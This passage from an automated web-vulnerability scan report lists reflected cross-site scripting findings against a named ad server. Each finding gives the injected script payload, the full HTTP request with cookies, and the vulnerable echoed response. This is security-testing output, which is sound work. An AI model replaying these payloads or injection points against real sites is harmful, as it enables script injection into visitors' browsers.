function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substring(s,e);
}
var camp="USNetwork/RS_SELL_2011Q1_AOL_CPA_300&2009a"-alert(1)-"48bddd10057=1";

camp=camp.toUpperCase();

if((camp.indexOf("AOL") == -1 )&&(camp.indexOf("GGL")) == -1){
if((cookie_check("dlx_20100929=",document.cookie)).length == 0) {

// Set cookie with marker to
...[SNIP]...

4.309. http://dm.de.mookie1.com/2/B3DM/2010DM/11542712710@x23 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://dm.de.mookie1.com
Path:	/2/B3DM/2010DM/11542712710@x23

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bdb7f"><script>alert(1)</script>e7d57906e4a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DMbdb7f"><script>alert(1)</script>e7d57906e4a/2010DM/11542712710@x23?USNetwork/RS_SELL_2011Q1_AOL_CPA_300 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; NSC_en.ef.efm_qppm_iuuq=ffffffff09499e6f45525d5f4f58455e445a4a423660; session=1296256112|1296260059

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:00:46 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 334
Content-Type: text/html

<A HREF="http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/B3DMbdb7f"><script>alert(1)</script>e7d57906e4a/2010DM/1721942303/x23/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top"><
...[SNIP]...

4.310. http://dm.de.mookie1.com/2/B3DM/2010DM/11542712710@x23 [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://dm.de.mookie1.com
Path:	/2/B3DM/2010DM/11542712710@x23

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a9d3c"><script>alert(1)</script>11d0b336fd9 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM/2010DMa9d3c"><script>alert(1)</script>11d0b336fd9/11542712710@x23?USNetwork/RS_SELL_2011Q1_AOL_CPA_300 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; NSC_en.ef.efm_qppm_iuuq=ffffffff09499e6f45525d5f4f58455e445a4a423660; session=1296256112|1296260059

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:01:13 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 333
Content-Type: text/html

<A HREF="http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/B3DM/2010DMa9d3c"><script>alert(1)</script>11d0b336fd9/305405675/x23/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top"><I
...[SNIP]...

4.311. http://dm.de.mookie1.com/2/B3DM/2010DM/11542712710@x23 [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://dm.de.mookie1.com
Path:	/2/B3DM/2010DM/11542712710@x23

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d02f1"><script>alert(1)</script>ede31db6dca was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM/2010DM/11542712710@x23d02f1"><script>alert(1)</script>ede31db6dca?USNetwork/RS_SELL_2011Q1_AOL_CPA_300 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; NSC_en.ef.efm_qppm_iuuq=ffffffff09499e6f45525d5f4f58455e445a4a423660; session=1296256112|1296260059

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:01:20 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 326
Content-Type: text/html

<A HREF="http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/B3DM/2010DM/1884793408/x23d02f1"><script>alert(1)</script>ede31db6dca/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top"><
...[SNIP]...

4.312. http://dm.de.mookie1.com/2/B3DM/2010DM/11542712710@x23 [USNetwork/RS_SELL_2011Q1_AOL_CPA_300 parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://dm.de.mookie1.com
Path:	/2/B3DM/2010DM/11542712710@x23

Issue detail

The value of the USNetwork/RS_SELL_2011Q1_AOL_CPA_300 request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 495ac"-alert(1)-"d325f4e03a6 was submitted in the USNetwork/RS_SELL_2011Q1_AOL_CPA_300 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /2/B3DM/2010DM/11542712710@x23?USNetwork/RS_SELL_2011Q1_AOL_CPA_300495ac"-alert(1)-"d325f4e03a6 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; NSC_en.ef.efm_qppm_iuuq=ffffffff09499e6f45525d5f4f58455e445a4a423660; session=1296256112|1296260059

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:00:44 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2483
Content-Type: text/html

<html>
<head></head>
<body>
<script>
function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substring(s,e);
}
var camp="USNetwork/RS_SELL_2011Q1_AOL_CPA_300495ac"-alert(1)-"d325f4e03a6";

camp=camp.toUpperCase();

if((camp.indexOf("AOL") == -1 )&&(camp.indexOf("GGL")) == -1){
if((cookie_check("dlx_20100929=",document.cookie)).length == 0) {

// Set cookie with marker to ch
...[SNIP]...

4.313. http://dm.de.mookie1.com/2/B3DM/2010DM/11542712710@x23 [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://dm.de.mookie1.com
Path:	/2/B3DM/2010DM/11542712710@x23

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 55739"-alert(1)-"ce4a27e97fe was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /2/B3DM/2010DM/11542712710@x23?USNetwork/RS_SELL_2011Q1_AOL_CPA_300&55739"-alert(1)-"ce4a27e97fe=1 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; NSC_en.ef.efm_qppm_iuuq=ffffffff09499e6f45525d5f4f58455e445a4a423660; session=1296256112|1296260059

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:00:44 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2486
Content-Type: text/html

<html>
<head></head>
<body>
<script>
function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substring(s,e);
}
var camp="USNetwork/RS_SELL_2011Q1_AOL_CPA_300&55739"-alert(1)-"ce4a27e97fe=1";

camp=camp.toUpperCase();

if((camp.indexOf("AOL") == -1 )&&(camp.indexOf("GGL")) == -1){
if((cookie_check("dlx_20100929=",document.cookie)).length == 0) {

// Set cookie with marker to
...[SNIP]...

4.314. http://dm.de.mookie1.com/2/B3DM/2010DM/11687741401@x23 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://dm.de.mookie1.com
Path:	/2/B3DM/2010DM/11687741401@x23

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c4a53"><script>alert(1)</script>840ef40ea8a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DMc4a53"><script>alert(1)</script>840ef40ea8a/2010DM/11687741401@x23?USNetwork/RS_SELL_2011Q1_AOL_CPA_300 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://bh.heraldinteractive.com/includes/processAds.bg?position=Middle&companion=Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom&page=bh.heraldinteractive.com%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set

Response

4.315. http://dm.de.mookie1.com/2/B3DM/2010DM/11687741401@x23 [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://dm.de.mookie1.com
Path:	/2/B3DM/2010DM/11687741401@x23

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 64f21"><script>alert(1)</script>bbec3aa3a93 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM/2010DM64f21"><script>alert(1)</script>bbec3aa3a93/11687741401@x23?USNetwork/RS_SELL_2011Q1_AOL_CPA_300 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://bh.heraldinteractive.com/includes/processAds.bg?position=Middle&companion=Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom&page=bh.heraldinteractive.com%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set

Response

4.316. http://dm.de.mookie1.com/2/B3DM/2010DM/11687741401@x23 [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://dm.de.mookie1.com
Path:	/2/B3DM/2010DM/11687741401@x23

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b10ef"><script>alert(1)</script>b222cfdaba7 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM/2010DM/11687741401@x23b10ef"><script>alert(1)</script>b222cfdaba7?USNetwork/RS_SELL_2011Q1_AOL_CPA_300 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://bh.heraldinteractive.com/includes/processAds.bg?position=Middle&companion=Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom&page=bh.heraldinteractive.com%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:01:16 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 326
Content-Type: text/html
Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09499e2245525d5f4f58455e445a4a423660;path=/

<A HREF="http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/B3DM/2010DM/1804525218/x23b10ef"><script>alert(1)</script>b222cfdaba7/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top"><
...[SNIP]...

4.317. http://dm.de.mookie1.com/2/B3DM/2010DM/11687741401@x23 [USNetwork/RS_SELL_2011Q1_AOL_CPA_300 parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://dm.de.mookie1.com
Path:	/2/B3DM/2010DM/11687741401@x23

Issue detail

The value of the USNetwork/RS_SELL_2011Q1_AOL_CPA_300 request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9c13b"-alert(1)-"885857494a0 was submitted in the USNetwork/RS_SELL_2011Q1_AOL_CPA_300 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /2/B3DM/2010DM/11687741401@x23?USNetwork/RS_SELL_2011Q1_AOL_CPA_3009c13b"-alert(1)-"885857494a0 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://bh.heraldinteractive.com/includes/processAds.bg?position=Middle&companion=Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom&page=bh.heraldinteractive.com%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:00:39 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2483
Content-Type: text/html
Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09499e3945525d5f4f58455e445a4a423660;path=/

<html>
<head></head>
<body>
<script>
function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substring(s,e);
}
var camp="USNetwork/RS_SELL_2011Q1_AOL_CPA_3009c13b"-alert(1)-"885857494a0";

camp=camp.toUpperCase();

if((camp.indexOf("AOL") == -1 )&&(camp.indexOf("GGL")) == -1){
if((cookie_check("dlx_20100929=",document.cookie)).length == 0) {

// Set cookie with marker to ch
...[SNIP]...

4.318. http://dm.de.mookie1.com/2/B3DM/2010DM/11687741401@x23 [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://dm.de.mookie1.com
Path:	/2/B3DM/2010DM/11687741401@x23

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b8ab5"-alert(1)-"7b522b29148 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /2/B3DM/2010DM/11687741401@x23?USNetwork/RS_SELL_2011Q1_AOL_CPA_300&b8ab5"-alert(1)-"7b522b29148=1 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://bh.heraldinteractive.com/includes/processAds.bg?position=Middle&companion=Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom&page=bh.heraldinteractive.com%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:00:43 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2486
Content-Type: text/html
Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09499e2645525d5f4f58455e445a4a423660;path=/

<html>
<head></head>
<body>
<script>
function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substring(s,e);
}
var camp="USNetwork/RS_SELL_2011Q1_AOL_CPA_300&b8ab5"-alert(1)-"7b522b29148=1";

camp=camp.toUpperCase();

if((camp.indexOf("AOL") == -1 )&&(camp.indexOf("GGL")) == -1){
if((cookie_check("dlx_20100929=",document.cookie)).length == 0) {

// Set cookie with marker to
...[SNIP]...

4.319. http://dm.de.mookie1.com/2/B3DM/2010DM/1169827066@x23 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://dm.de.mookie1.com
Path:	/2/B3DM/2010DM/1169827066@x23

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 770f6"><script>alert(1)</script>7298dce66c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM770f6"><script>alert(1)</script>7298dce66c/2010DM/1169827066@x23?USNetwork/RS_SELL_2011Q1_AOL_CPA_728 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://bh.heraldinteractive.com/includes/processAds.bg?position=Top&companion=Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom&page=bh.heraldinteractive.com%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; NSC_en.ef.efm_qppm_iuuq=ffffffff09499e3645525d5f4f58455e445a4a423660; session=1296251852|1296251852

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:00:41 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 332
Content-Type: text/html

<A HREF="http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/B3DM770f6"><script>alert(1)</script>7298dce66c/2010DM/754220993/x23/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top"><IM
...[SNIP]...

4.320. http://dm.de.mookie1.com/2/B3DM/2010DM/1169827066@x23 [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://dm.de.mookie1.com
Path:	/2/B3DM/2010DM/1169827066@x23

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e4c10"><script>alert(1)</script>d8743e92489 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM/2010DMe4c10"><script>alert(1)</script>d8743e92489/1169827066@x23?USNetwork/RS_SELL_2011Q1_AOL_CPA_728 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://bh.heraldinteractive.com/includes/processAds.bg?position=Top&companion=Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom&page=bh.heraldinteractive.com%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; NSC_en.ef.efm_qppm_iuuq=ffffffff09499e3645525d5f4f58455e445a4a423660; session=1296251852|1296251852

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:00:46 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 334
Content-Type: text/html

<A HREF="http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/B3DM/2010DMe4c10"><script>alert(1)</script>d8743e92489/1999546154/x23/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top"><
...[SNIP]...

4.321. http://dm.de.mookie1.com/2/B3DM/2010DM/1169827066@x23 [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://dm.de.mookie1.com
Path:	/2/B3DM/2010DM/1169827066@x23

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ce5e6"><script>alert(1)</script>7b9a5b33a77 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM/2010DM/1169827066@x23ce5e6"><script>alert(1)</script>7b9a5b33a77?USNetwork/RS_SELL_2011Q1_AOL_CPA_728 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
